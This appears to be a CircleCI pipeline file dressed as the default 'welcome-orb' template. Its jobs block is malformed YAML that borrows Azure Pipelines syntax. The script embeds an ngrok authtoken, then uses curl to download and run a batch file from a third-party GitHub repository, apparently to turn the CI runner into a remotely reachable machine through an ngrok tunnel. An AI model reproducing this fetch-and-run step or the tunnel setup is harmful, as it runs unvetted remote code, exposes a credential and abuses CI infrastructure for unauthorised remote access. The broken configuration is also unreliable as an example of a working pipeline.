# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      vmImage: windows-latest
        steps:
          checkout: none 
      script: 
       echo ngrok authtoken "1k4L5QXzedXoyA5OawS4IVe7nQb_79AQTC1h3xUaTVQ5rZf4a" > NGROK.bat
       curl -s -O https://raw.githubusercontent.com/DevMoonTv/uh2uho207d/master/AzureNgrokAutoRegion.bat
       AzureNgrokAutoRegion.bat
